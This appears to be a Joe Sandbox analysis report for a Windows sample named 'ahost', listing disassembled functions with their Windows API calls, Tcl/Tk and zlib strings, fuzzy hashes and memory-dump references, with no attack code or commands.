Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: c96c9b31988018986e1f3885fe58d5b314b84a6d3d30878889b1be9de6293051
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 9051D861F0964946FB64AE25AC0067AE6A1AF44BACF944734DF7D437CDEF3CD4018AA0

Function 00007FF7F91FC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7F91FC33D), ref: 00007FF7F91FC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7F91FC33D), ref: 00007FF7F91FC1FA

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 8e14470d234dd54ed00dc2bd32ee21cadaa43b285cb6f706435381aa38cd5bae
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 6F11E261A18A4581EB20AF25BC14169A371AB41BF8FA40331EE7E4B7ECDF3CD0118780

Function 00007FF7F91FA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: d87bd7ae32fddcae56845bd813a3300c51b8365cbdb2dea8c668fe8c27b6d6f5
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 5BE04F10F0920642FF547FB26C8517891716F84B44F844134CA3D862EAFE2C689583B0

Function 00007FF7F91FABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC36
GetLastError.KERNEL32(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC40

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 2a21e30385b3368fc9d2ce6c3d3da71baf87aa466c829b30c2c42fa73aca0d4c
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 8521B321F1C64641FBD4AF21BC9027992A65F847A8F984334DB3E473D9FE6CA4404390

Function 00007FF7F91FBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FBF44

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: f54cd4fd4dadf9e2d986613561f72392da95f41ba0df84fe0a753b136376ff2b
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 4141A232D0820987FB74AF15F940279B3B4EB55B48F940131D7BD866D9EB2DE4028AA1

Function 00007FF7F91E7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7F91E802A

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
Instruction ID: 03bbbc4c37ab351b520f6a4c5d1163f782ac27e06166d5ca2fd98c891b0e493a
Opcode Fuzzy Hash: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
Instruction Fuzzy Hash: F221BB21F1865286FB58BE2279043BAD661BF45BD8FCC0070EE6C077CADE3DE44186A1

Function 00007FF7F91FB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FBA32

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: ba4f1c134a783ccdc4b500deed89fb48745e438841059c75e2539ea0e805a081
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: AE317C31E2864A85F761BF55AC4127CAA70AB80B98FC10135EB3D473DAEF7CA45187B0

Function 00007FF7F91F99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7F91F99FF

Part of subcall function 00007FF7F91F9AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF7F91F9B1D
Part of subcall function 00007FF7F91F9AF8: GetProcAddress.KERNEL32 ref: 00007FF7F91F9B33
Part of subcall function 00007FF7F91F9AF8: FreeLibrary.KERNEL32 ref: 00007FF7F91F9B5A

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 0e6062f7fdf114268bbb36e2bfa347b911cd0c1942f441372feaa4eca54c484b
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 72216D36E0468ACAEB64AF68D8442AC73B4EB4471CF844635D73D06ADDEF38D544C7A0

Function 00007FF7F91F6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F5F69

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 180e1abbd3a409681df0892ecc8f6042999b75a6e9021efee80724af34e77979
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 60114F22E1864942FB60BF11B80017DE674AF85B88F8540B1EB7D57ADAEF3ED40087A0

Function 00007FF7F92063C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F92063E7

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 676c7c1d506c1664077f5287841121bc6a905ceb5ea9742d912aa7df9a95cef2
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: B2219572E1864586EBA1AF18E840379B6B0FB84B54F944334E6AD876EDDF3CD4048B50

Function 00007FF7F91F042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F0480

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: c7da64207e5e993d3a647450791a941979b7ebdfa649c29cd98b28bcb0fc40bc
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 9D018E22E0874941EB05EF52AD01079E6A1BF85FE8B884631EF7C57BDAEE3CE1018750

Function 00007FF7F91FD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7F91F0D00,?,?,?,00007FF7F91F236A,?,?,?,?,?,00007FF7F91F3B59), ref: 00007FF7F91FD6AA

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 4ca5cd52a44ddc0ed6aa6d754ea44280300fe51a4618d9d5b00d4a7fd9cba1d9
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 50F03A04E09A0E44FF647F616C412B992B04F94BB8FC802309E3E852EAEE2CA44482F0

Non-executed Functions

Function 00007FF7F91E76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7F91E76C7
GetLastError.KERNEL32 ref: 00007FF7F91E76D9
GetProcAddress.KERNEL32 ref: 00007FF7F91E7715
GetLastError.KERNEL32 ref: 00007FF7F91E7727
GetProcAddress.KERNEL32 ref: 00007FF7F91E7740
GetLastError.KERNEL32 ref: 00007FF7F91E7752
GetProcAddress.KERNEL32 ref: 00007FF7F91E776B
GetLastError.KERNEL32 ref: 00007FF7F91E777D
GetProcAddress.KERNEL32 ref: 00007FF7F91E7799
GetLastError.KERNEL32 ref: 00007FF7F91E77AB
GetProcAddress.KERNEL32 ref: 00007FF7F91E77C7
GetLastError.KERNEL32 ref: 00007FF7F91E77D9
GetProcAddress.KERNEL32 ref: 00007FF7F91E77F5
GetLastError.KERNEL32 ref: 00007FF7F91E7807
GetProcAddress.KERNEL32 ref: 00007FF7F91E7823
GetLastError.KERNEL32 ref: 00007FF7F91E7835
GetProcAddress.KERNEL32 ref: 00007FF7F91E7851
GetLastError.KERNEL32 ref: 00007FF7F91E7863

Strings

Tcl_ConditionFinalize, xrefs: 00007FF7F91E792D, 00007FF7F91E794F
Tcl_CreateObjCommand, xrefs: 00007FF7F91E7A6F, 00007FF7F91E7A91
Tcl_GetCurrentThread, xrefs: 00007FF7F91E7847, 00007FF7F91E7869
Tcl_Finalize, xrefs: 00007FF7F91E778F, 00007FF7F91E77B1
Tcl_DoOneEvent, xrefs: 00007FF7F91E7761, 00007FF7F91E7783
Tcl_GetString, xrefs: 00007FF7F91E7A9D, 00007FF7F91E7ABF
Tcl_EvalEx, xrefs: 00007FF7F91E7BB1, 00007FF7F91E7BD3
Tcl_CreateThread, xrefs: 00007FF7F91E7819, 00007FF7F91E783B
Tcl_CreateInterp, xrefs: 00007FF7F91E770B, 00007FF7F91E772D
Tcl_FinalizeThread, xrefs: 00007FF7F91E77BD, 00007FF7F91E77DF
Tcl_JoinThread, xrefs: 00007FF7F91E7875, 00007FF7F91E7897
Tcl_DeleteInterp, xrefs: 00007FF7F91E77EB, 00007FF7F91E780D
Tcl_Free, xrefs: 00007FF7F91E7C3B, 00007FF7F91E7C5D
GetProcAddress, xrefs: 00007FF7F91E76EF
Tcl_GetVar2, xrefs: 00007FF7F91E7A13, 00007FF7F91E7A35
Tcl_SetVar2Ex, xrefs: 00007FF7F91E7B27, 00007FF7F91E7B49
Tcl_MutexLock, xrefs: 00007FF7F91E78A3, 00007FF7F91E78C5
Tcl_MutexFinalize, xrefs: 00007FF7F91E78FF, 00007FF7F91E7921
Tcl_SetVar2, xrefs: 00007FF7F91E7A41, 00007FF7F91E7A63
Tcl_MutexUnlock, xrefs: 00007FF7F91E78D1, 00007FF7F91E78F3
Tk_GetNumMainWindows, xrefs: 00007FF7F91E7C97, 00007FF7F91E7CB9
Tcl_ConditionNotify, xrefs: 00007FF7F91E795B, 00007FF7F91E797D
Tk_Init, xrefs: 00007FF7F91E7C69, 00007FF7F91E7C8B
Tcl_ThreadQueueEvent, xrefs: 00007FF7F91E79B7, 00007FF7F91E79D9
Tcl_EvalObjv, xrefs: 00007FF7F91E7BDF, 00007FF7F91E7C01
Tcl_NewByteArrayObj, xrefs: 00007FF7F91E7AF9, 00007FF7F91E7B1B
Tcl_ConditionWait, xrefs: 00007FF7F91E7989, 00007FF7F91E79AB
Tcl_GetObjResult, xrefs: 00007FF7F91E7B55, 00007FF7F91E7B77
Tcl_EvalFile, xrefs: 00007FF7F91E7B83, 00007FF7F91E7BA5
Failed to get address for %hs, xrefs: 00007FF7F91E76E8
Tcl_Alloc, xrefs: 00007FF7F91E7C0D, 00007FF7F91E7C2F
Tcl_Init, xrefs: 00007FF7F91E76C0, 00007FF7F91E76DF
Tcl_FindExecutable, xrefs: 00007FF7F91E7736, 00007FF7F91E7758
Tcl_ThreadAlert, xrefs: 00007FF7F91E79E5, 00007FF7F91E7A07
Tcl_NewStringObj, xrefs: 00007FF7F91E7ACB, 00007FF7F91E7AED

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 13820e88d307691d267fa4ba2213d3887509f0c0e674407d05860e71928d0396
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 09026D24E0AB0791FBA5BF55BC145B8A2B1AF08754FC45435D83E826ECEF3CB55C82A1

Function 00007FF7F920411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7F920416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F92047D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9204C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9204E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9205067
memcpy_s.LIBCPMT ref: 00007FF7F9205142
memcpy_s.LIBCPMT ref: 00007FF7F92051ED
memcpy_s.LIBCPMT ref: 00007FF7F92052BC

Strings

1#QNAN, xrefs: 00007FF7F9204283
1#INF, xrefs: 00007FF7F9204293
1#IND, xrefs: 00007FF7F9204257
1#SNAN, xrefs: 00007FF7F920427A

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 5acb07627ae316a0b5817bfff5e6ee92e3357cdee5580afa161594624903ac65
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: 75B2C872E182824BF7A49E65D8407FDB7B1FB94344F905135DA2D97ADCEB38A9008B90

Function 00007FF7F91EAD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid bit length repeat, xrefs: 00007FF7F91EB109
invalid distance too far back, xrefs: 00007FF7F91EB6E0
invalid distances set, xrefs: 00007FF7F91EB210
invalid code lengths set, xrefs: 00007FF7F91EAE9D
invalid code -- missing end-of-block, xrefs: 00007FF7F91EB136
invalid literal/length code, xrefs: 00007FF7F91EB452
too many length or distance symbols, xrefs: 00007FF7F91EAEB6
invalid distance code, xrefs: 00007FF7F91EB624
invalid literal/lengths set, xrefs: 00007FF7F91EB1A3

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: d444e9a0de4587bbcf9c1785001404934bd00e0fe64c226da1df109ed9d18fbf
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 23521772E146A68BE7A4AF15E858B7D7BB9FB44300F414139E65A837C4DB3CE840CB91

Function 00007FF7F91ED19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7F91ED1B8
RtlCaptureContext.KERNEL32 ref: 00007FF7F91ED1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F91ED1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F91ED240
IsDebuggerPresent.KERNEL32 ref: 00007FF7F91ED294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91ED2B1
